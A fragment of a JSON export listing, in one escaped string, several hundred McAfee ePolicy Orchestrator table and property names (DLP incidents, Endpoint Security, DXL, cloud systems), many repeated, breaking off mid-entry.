    "name": "\"[\\r\\n\\t\\t\\t\\\"workloaddetailVcenter.table.name\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error\\\",\\r\\n\\t\\t\\t\\\"DLP Data at Rest (Endpoint) Incidents History\\\",\\r\\n\\t\\t\\t\\\"groupinfo.table.name\\\",\\r\\n\\t\\t\\t\\\"epoproductproperties.table.name\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response Server Properties\\\",\\r\\n\\t\\t\\t\\\"Resolutions\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery Scans\\\",\\r\\n\\t\\t\\t\\\"Mobile Device Information\\\",\\r\\n\\t\\t\\t\\\"Manual Registration Documents Classification\\\",\\r\\n\\t\\t\\t\\\"McAfee Threat Intelligence Exchange Server Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"vpcflowLog.table.name\\\",\\r\\n\\t\\t\\t\\\"AWS Volume Properties\\\",\\r\\n\\t\\t\\t\\\"Events received from managed systems\\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\t\\\"Task Log Entries\\\",\\r\\n\\t\\t\\t\\\"Discovery Scan Info\\\",\\r\\n\\t\\t\\t\\\"DLP Data In-use/motion Incidents History\\\",\\r\\n\\t\\t\\t\\\"Rolled-Up Applied Policies\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error path \\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Statuses\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"Network discovery additional information \\\",\\r\\n\\t\\t\\t\\\"Installations\\\",\\r\\n\\t\\t\\t\\\"Tag Usage\\\",\\r\\n\\t\\t\\t\\\"mgi1.table.name\\\",\\r\\n\\t\\t\\t\\\"Groups\\\",\\r\\n\\t\\t\\t\\\"File Released From Quarantine\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"DXL Client Status\\\",\\r\\n\\t\\t\\t\\\"Active Response System\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error path \\\",\\r\\n\\t\\t\\t\\\"epoTagAssignment.table.name\\\",\\r\\n\\t\\t\\t\\\"Computer Properties\\\",\\r\\n\\t\\t\\t\\\"sasvmsetting.table.name\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Product Improvement Program Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Email\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"DXLProdPropsView_DXLCLIENT.table.name\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"Amazon Network Traffic Logs\\\",\\r\\n\\t\\t\\t\\\"DLP Discover Servers\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Installed Versions Summary\\\",\\r\\n\\t\\t\\t\\\"DLP Data at Rest (Network) Incidents\\\",\\r\\n\\t\\t\\t\\\"Network Communication Information\\\",\\r\\n\\t\\t\\t\\\"Generated Key\\\",\\r\\n\\t\\t\\t\\\"User Logged Into Safe Mode\\\",\\r\\n\\t\\t\\t\\\"Automatic Registration Documents\\\",\\r\\n\\t\\t\\t\\\"kubelabelinfo.table.name\\\",\\r\\n\\t\\t\\t\\\"McAfee DXL Broker Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection Systems\\\",\\r\\n\\t\\t\\t\\\"Amazon Web Service System Properties\\\",\\r\\n\\t\\t\\t\\\"System Properties\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"vminfo.table.name\\\",\\r\\n\\t\\t\\t\\\"Azure Discovery Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Tag Restrictions\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error\\\",\\r\\n\\t\\t\\t\\\"McAfee DXL Java Client Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"ePOLeafNode.table.name\\\",\\r\\n\\t\\t\\t\\\"Device Information\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Events\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"DLP Endpoint Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"MVISION EDR Properties\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"Network\\\",\\r\\n\\t\\t\\t\\\"DLP User Session Rules\\\",\\r\\n\\t\\t\\t\\\"Statuses\\\",\\r\\n\\t\\t\\t\\\"Apply RM Policy Failed\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Instances\\\",\\r\\n\\t\\t\\t\\\"Product Coverage Reports Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Applied Policies\\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"Generated Key\\\",\\r\\n\\t\\t\\t\\\"DLP Data at Rest (Network) Incidents\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"DLP Capture Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Source Application Information\\\",\\r\\n\\t\\t\\t\\\"Policy Assignment Broken Inheritance\\\",\\r\\n\\t\\t\\t\\\"Statuses\\\",\\r\\n\\t\\t\\t\\\"Email\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"DLP Data at Rest (Endpoint) Incidents \\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest Email Storage Discovery Classifications\\\",\\r\\n\\t\\t\\t\\\"vminfoVendortag.table.name\\\",\\r\\n\\t\\t\\t\\\"OpenStack Cloud (Generic) system properties\\\",\\r\\n\\t\\t\\t\\\"Capture Search Information\\\",\\r\\n\\t\\t\\t\\\"McAfee Advanced Threat Defense Properties\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"DLP Data at Rest (Network) Incidents History\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"Network DLP Appliance Info\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Platform Properties\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Rules\\\",\\r\\n\\t\\t\\t\\\"Mobile Device Information\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"Cloud\\\",\\r\\n\\t\\t\\t\\\"Active Response Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Policy Applied\\\",\\r\\n\\t\\t\\t\\\"Remediation Event Table\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Platform Rolled-Up Systems\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection Properties\\\",\\r\\n\\t\\t\\t\\\"workloadalerts.table.name\\\",\\r\\n\\t\\t\\t\\\"vmInfokubernetes.table.name\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Network Share\\\",\\r\\n\\t\\t\\t\\\"Repositories\\\",\\r\\n\\t\\t\\t\\\"Manual Registration Documents\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"File Classification\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall Properties\\\",\\r\\n\\t\\t\\t\\\"Release code locked\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery Scans\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Events\\\",\\r\\n\\t\\t\\t\\\"Endpoint Scan\\\",\\r\\n\\t\\t\\t\\\"Network discovery additional information \\\",\\r\\n\\t\\t\\t\\\"Rolled-Up Applied Client Tasks\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Platform Systems\\\",\\r\\n\\t\\t\\t\\\"Firewall Rule\\\",\\r\\n\\t\\t\\t\\\"Security Incidents\\\",\\r\\n\\t\\t\\t\\\"Web Control Events\\\",\\r\\n\\t\\t\\t\\\"Email - All Recipients\\\",\\r\\n\\t\\t\\t\\\"Systems\\\",\\r\\n\\t\\t\\t\\\"EPOEvents_RelatedTargetsView\\\",\\r\\n\\t\\t\\t\\\"Common Appliance Management Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"DLP Client Enters Bypass Mode\\\",\\r\\n\\t\\t\\t\\\"DLP Operational Events History\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control Systems\\\",\\r\\n\\t\\t\\t\\\"DLP Case Management\\\",\\r\\n\\t\\t\\t\\\"DLP User Session Properties\\\",\\r\\n\\t\\t\\t\\\"Tags\\\",\\r\\n\\t\\t\\t\\\"VMware System Properties\\\",\\r\\n\\t\\t\\t\\\"DLP OCR Addon Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Rules\\\",\\r\\n\\t\\t\\t\\\"Scan Information\\\",\\r\\n\\t\\t\\t\\\"User Groups\\\",\\r\\n\\t\\t\\t\\\"DC Discovery and Monitoring Properties\\\",\\r\\n\\t\\t\\t\\\"McAfee Client Proxy Properties\\\",\\r\\n\\t\\t\\t\\\"Agent Handlers\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control Rolled-Up Events\\\",\\r\\n\\t\\t\\t\\\"Policy Information\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall Systems\\\",\\r\\n\\t\\t\\t\\\"Registered Servers\\\",\\r\\n\\t\\t\\t\\\"Subtask Log Entries\\\",\\r\\n\\t\\t\\t\\\"discovery_file_facts_table_name\\\",\\r\\n\\t\\t\\t\\\"Firewall Client Rule Executables\\\",\\r\\n\\t\\t\\t\\\"workloaddetail_1.table.name\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"File Released From Quarantine\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Evidence Replication Failed\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Registered Cloud Account\\\",\\r\\n\\t\\t\\t\\\"Cloud system vendor-specific properties\\\",\\r\\n\\t\\t\\t\\\"Computers\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Removable Storage\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"RelayServer and SuperAgent Statistics Entries\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"DLP Endpoint Properties\\\",\\r\\n\\t\\t\\t\\\"Rolled-Up Compliance History\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error\\\",\\r\\n\\t\\t\\t\\\"Network Share\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Network Appliance information \\\",\\r\\n\\t\\t\\t\\\"Network Appliance information \\\",\\r\\n\\t\\t\\t\\\"EPOEvents_RelatedSourcesView\\\",\\r\\n\\t\\t\\t\\\"Network discovery action information \\\",\\r\\n\\t\\t\\t\\\"discovery_classification_facts_table_name\\\",\\r\\n\\t\\t\\t\\\"Products Property\\\",\\r\\n\\t\\t\\t\\\"File Released From Quarantine\\\",\\r\\n\\t\\t\\t\\\"Export Details\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Properties\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Platform Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"workloadDetailAwsAzure.table.name\\\",\\r\\n\\t\\t\\t\\\"DLP Client Exceeded Memory Limit On Load\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan details\\\",\\r\\n\\t\\t\\t\\\"Network DLP Appliance Info\\\",\\r\\n\\t\\t\\t\\\"DLP Discover Data Inventory\\\",\\r\\n\\t\\t\\t\\\"DLP Capture Properties\\\",\\r\\n\\t\\t\\t\\\"Tags\\\",\\r\\n\\t\\t\\t\\\"DLP Data In-use/motion Incidents \\\",\\r\\n\\t\\t\\t\\\"Client Task Assignment Broken Inheritance\\\",\\r\\n\\t\\t\\t\\\"McAfee DXL Java Client Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Statuses\\\",\\r\\n\\t\\t\\t\\\"DLP Data In-use/motion Incidents \\\",\\r\\n\\t\\t\\t\\\"McAfee Client Proxy Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"DLP Computer Policies\\\",\\r\\n\\t\\t\\t\\\"DLP Data at Rest (Endpoint) Incidents History\\\",\\r\\n\\t\\t\\t\\\"Cloud system properties\\\",\\r\\n\\t\\t\\t\\\"Extended Computer Properties\\\",\\r\\n\\t\\t\\t\\\"fwClientRule.LocalNetwork\\\",\\r\\n\\t\\t\\t\\\"System Properties\\\",\\r\\n\\t\\t\\t\\\"Rolled-Up Managed Systems\\\",\\r\\n\\t\\t\\t\\\"Product Improvement Program Properties\\\",\\r\\n\\t\\t\\t\\\"User Logged Into Safe Mode\\\",\\r\\n\\t\\t\\t\\\"System Health Indicator\\\",\\r\\n\\t\\t\\t\\\"Data at Rest (Endpoint) Incidents Rollup\\\",\\r\\n\\t\\t\\t\\\"Active Response Custom Events\\\",\\r\\n\\t\\t\\t\\\"Capture Search Information\\\",\\r\\n\\t\\t\\t\\\"Capture Search Information\\\",\\r\\n\\t\\t\\t\\\"UDLP_OperationalEventResolution_Rollup\\\",\\r\\n\\t\\t\\t\\\"DLP Client Exceeded Memory Limit On Load\\\",\\r\\n\\t\\t\\t\\\"Generated Key\\\",\\r\\n\\t\\t\\t\\\"tagIssueCount.table.name\\\",\\r\\n\\t\\t\\t\\\"Client Events\\\",\\r\\n\\t\\t\\t\\\"Product Coverage Reports Properties\\\",\\r\\n\\t\\t\\t\\\"sassettingstatus.table.name\\\",\\r\\n\\t\\t\\t\\\"Capture search list\\\",\\r\\n\\t\\t\\t\\\"Release code locked\\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"File Classification\\\",\\r\\n\\t\\t\\t\\\"DLP Data In-use/motion Incidents History\\\",\\r\\n\\t\\t\\t\\\"groupproperty.table.name\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Computers\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Client interface logon audit log\\\",\\r\\n\\t\\t\\t\\\"Device Information\\\",\\r\\n\\t\\t\\t\\\"McAfee DXL Java Client Properties\\\",\\r\\n\\t\\t\\t\\\"mginf.table.name\\\",\\r\\n\\t\\t\\t\\\"DLP Discover Data Inventory\\\",\\r\\n\\t\\t\\t\\\"Source Application Information\\\",\\r\\n\\t\\t\\t\\\"fwClientRule.RemoteNetwork\\\",\\r\\n\\t\\t\\t\\\"System Tree\\\",\\r\\n\\t\\t\\t\\\"Issues\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error path \\\",\\r\\n\\t\\t\\t\\\"McAfee DXL Java Client Properties\\\",\\r\\n\\t\\t\\t\\\"McAfee Threat Intelligence Exchange Server Properties\\\",\\r\\n\\t\\t\\t\\\"vmproperty.table.name\\\",\\r\\n\\t\\t\\t\\\"Email - All Recipients\\\",\\r\\n\\t\\t\\t\\\"Network discovery action information \\\",\\r\\n\\t\\t\\t\\\"DLP Monitor Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"DLP Discover Data Inventory\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Rolled-Up Threat Events\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"Resolutions\\\",\\r\\n\\t\\t\\t\\\"Apply RM Policy Failed\\\",\\r\\n\\t\\t\\t\\\"DLP Discover Data Inventory\\\",\\r\\n\\t\\t\\t\\\"Policy Information\\\",\\r\\n\\t\\t\\t\\\"Systems Per Product\\\",\\r\\n\\t\\t\\t\\\"Network Communication Information\\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\t\\\"epoTagVendortag.table.name\\\",\\r\\n\\t\\t\\t\\\"Rolled-Up Client Events\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response Platform Properties\\\",\\r\\n\\t\\t\\t\\\"Apply RM Policy Failed\\\",\\r\\n\\t\\t\\t\\\"Network Share\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention Systems\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response Platform Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Azure Discovery Properties\\\",\\r\\n\\t\\t\\t\\\"Printer\\\",\\r\\n\\t\\t\\t\\\"DLP Client Enters Bypass Mode\\\",\\r\\n\\t\\t\\t\\\"epoTagAssignmentVendortag.table.name\\\",\\r\\n\\t\\t\\t\\\"capture_dataset_table_name\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Release code locked\\\",\\r\\n\\t\\t\\t\\\"Destination User Information\\\",\\r\\n\\t\\t\\t\\\"Tag Groups\\\",\\r\\n\\t\\t\\t\\\"DLP Case Endpoint Discovery Incidents (Hidden)\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"DLP OCR Addon Properties\\\",\\r\\n\\t\\t\\t\\\"Server Keys\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention Properties\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Evidence Replication Failed\\\",\\r\\n\\t\\t\\t\\\"vmInfoawsazure.table.name\\\",\\r\\n\\t\\t\\t\\\"vminfoDetail.table.name\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest Email Storage Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"Task Log Messages\\\",\\r\\n\\t\\t\\t\\\"capture_dataset_table_name\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Extended Computer Properties\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"Tag Type\\\",\\r\\n\\t\\t\\t\\\"Tags\\\",\\r\\n\\t\\t\\t\\\"DLP Operational Events\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Current Email Storage Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"DLP Data In-use/motion Incidents Rollup\\\",\\r\\n\\t\\t\\t\\\"Destination User Groups\\\",\\r\\n\\t\\t\\t\\\"DC Discovery and Monitoring Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\t\\\"Automatic Registration Documents Classification\\\",\\r\\n\\t\\t\\t\\\"Network discovery action information \\\",\\r\\n\\t\\t\\t\\\"Rules\\\",\\r\\n\\t\\t\\t\\\"Network DLP Appliance Info\\\",\\r\\n\\t\\t\\t\\\"DLP Appliance Management Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"DLP Monitor Properties\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Microsoft Azure System Properties.\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Current File System Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"Status Events\\\",\\r\\n\\t\\t\\t\\\"Manual Registration Documents\\\",\\r\\n\\t\\t\\t\\\"Printer\\\",\\r\\n\\t\\t\\t\\\"Application\\\",\\r\\n\\t\\t\\t\\\"MVISION EDR Custom Events\\\",\\r\\n\\t\\t\\t\\\"IP address List\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest File System Discovery Classifications\\\",\\r\\n\\t\\t\\t\\\"Cloud Volume Properties \\\",\\r\\n\\t\\t\\t\\\"Exploit Prevention Events\\\",\\r\\n\\t\\t\\t\\\"Agent Enforcement Status\\\",\\r\\n\\t\\t\\t\\\"vminfo1.table.name\\\",\\r\\n\\t\\t\\t\\\"DLP Computer Properties\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"MVISION EDR System\\\",\\r\\n\\t\\t\\t\\\"Event Product\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan details\\\",\\r\\n\\t\\t\\t\\\"Capture Search Information\\\",\\r\\n\\t\\t\\t\\\"User Information\\\",\\r\\n\\t\\t\\t\\\"DLP Prevent Properties\\\",\\r\\n\\t\\t\\t\\\"issueDetailCount.table.name\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan details\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"McAfee DXLBroker Properties \\\",\\r\\n\\t\\t\\t\\\"Tags\\\",\\r\\n\\t\\t\\t\\\"epoevents4.table.name\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Capture Results\\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\t\\\"accountdetails.table.name\\\",\\r\\n\\t\\t\\t\\\"Cloud\\\",\\r\\n\\t\\t\\t\\\"LDAP Properties\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Audit Log Entries\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response Aggregator Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"Network discovery additional information \\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"User Logged Into Safe Mode\\\",\\r\\n\\t\\t\\t\\\"Policy Applied\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"Common Appliance Management\\\",\\r\\n\\t\\t\\t\\\"Usage Metering Report\\\",\\r\\n\\t\\t\\t\\\"Application\\\",\\r\\n\\t\\t\\t\\\"ePOComputerProperties.table.name\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response Server Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"McAfee Advanced Threat Defense Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Agent Properties\\\",\\r\\n\\t\\t\\t\\\"epoevents.table.name\\\",\\r\\n\\t\\t\\t\\\"DC Assessment Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"DLP Prevent Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Product Status\\\",\\r\\n\\t\\t\\t\\\"Roles and Permissions\\\",\\r\\n\\t\\t\\t\\\"gridthreatlist.table.name\\\",\\r\\n\\t\\t\\t\\\"Resolutions\\\",\\r\\n\\t\\t\\t\\\"DXL Broker Systems\\\",\\r\\n\\t\\t\\t\\\"Threat Events\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Cloud Volume vendor-specific properties\\\",\\r\\n\\t\\t\\t\\\"Agent Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Applied Client Tasks\\\",\\r\\n\\t\\t\\t\\\"DLP Client Exceeded Memory Limit On Load\\\",\\r\\n\\t\\t\\t\\\"McAfee DXL Client Properties\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Removable Storage\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"DXL Client Systems\\\",\\r\\n\\t\\t\\t\\\"Active Response Properties\\\",\\r\\n\\t\\t\\t\\\"DLP Appliance Management Properties\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall Rolled-Up Systems\\\",\\r\\n\\t\\t\\t\\\"Hyper-V System Properties\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control Properties\\\",\\r\\n\\t\\t\\t\\\"eventlist4.table.name\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Cloud Volume vendor-specific properties\\\",\\r\\n\\t\\t\\t\\\"DLP Server Properties\\\",\\r\\n\\t\\t\\t\\\"Rolled-Up Threat Events\\\",\\r\\n\\t\\t\\t\\\"Network Communication Information\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control Rolled-Up Systems\\\",\\r\\n\\t\\t\\t\\\"File Classification\\\",\\r\\n\\t\\t\\t\\\"Email\\\",\\r\\n\\t\\t\\t\\\"Email\\\",\\r\\n\\t\\t\\t\\\"Printer\\\",\\r\\n\\t\\t\\t\\\"DC Assessment Properties\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest File System Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"Endpoint Systems\\\",\\r\\n\\t\\t\\t\\\"Client Interface Locked Machines\\\",\\r\\n\\t\\t\\t\\\"Policy Applied\\\",\\r\\n\\t\\t\\t\\\"Host Cache Item Table\\\",\\r\\n\\t\\t\\t\\\"Cache Info Table\\\",\\r\\n\\t\\t\\t\\\"Device Information\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention Rolled-Up Systems\\\",\\r\\n\\t\\t\\t\\\"MVISION EDR Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"workloaddetailKubernetes.table.name\\\",\\r\\n\\t\\t\\t\\\"Subtask Log Messages\\\",\\r\\n\\t\\t\\t\\\"McAfee DXL Client Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"File Classification\\\",\\r\\n\\t\\t\\t\\\"DLP Operational Events Rollup\\\",\\r\\n\\t\\t\\t\\\"vminfovcenter.table.name\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"Network Communication Information\\\",\\r\\n\\t\\t\\t\\\"Cloud\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"Email - All Recipients\\\",\\r\\n\\t\\t\\t\\\"Evidence Replication Failed\\\",\\r\\n\\t\\t\\t\\\"Compliance History\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response Aggregator Properties\\\",\\r\\n\\t\\t\\t\\\"User Information\\\",\\r\\n\\t\\t\\t\\\"Kubernetes Service System Properties\\\",\\r\\n\\t\\t\\t\\\"DLP Server Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"account.table.name\\\",\\r\\n\\t\\t\\t\\\"DLP Client Enters Bypass Mode\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error\\\",\\r\\n\\t\\t\\t\\\"Capture Search Information\\\",\\r\\n\\t\\t\\t\\\"DLP Data at Rest (Endpoint) Incidents History\\\",\\r\\n\\t\\t\\t\\\"DLP Client Exceeded Memory Limit On Load\\\",\\r\\n\\t\\t\\t\\\"Resolutions\\\",\\r\\n\\t\\t\\t\\\"Generated Key\\\",\\r\\n\\t\\t\\t\\\"Mobile Device Information\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan details\\\",\\r\\n\\t\\t\\t\\\"Tags\\\",\\r\\n\\t\\t\\t\\\"DLP Operational Events History\\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\t\\\"Release code locked\\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"DLP Case Management\\\",\\r\\n\\t\\t\\t\\\"DLP User Session Properties\\\",\\r\\n\\t\\t\\t\\\"Discovery Scan Info\\\",\\r\\n\\t\\t\\t\\\"DLP Data In-use/motion Incidents History\\\",\\r\\n\\t\\t\\t\\\"Computers\\\",\\r\\n\\t\\t\\t\\\"Cloud\\\",\\r\\n\\t\\t\\t\\\"Rules\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Scan Information\\\",\\r\\n\\t\\t\\t\\\"Network discovery additional information \\\",\\r\\n\\t\\t\\t\\\"User Groups\\\",\\r\\n\\t\\t\\t\\\"Device Information\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Installed Versions Summary\\\",\\r\\n\\t\\t\\t\\\"Network discovery additional information \\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error path \\\",\\r\\n\\t\\t\\t\\\"File Released From Quarantine\\\",\\r\\n\\t\\t\\t\\\"System Tree\\\",\\r\\n\\t\\t\\t\\\"Email - Matched 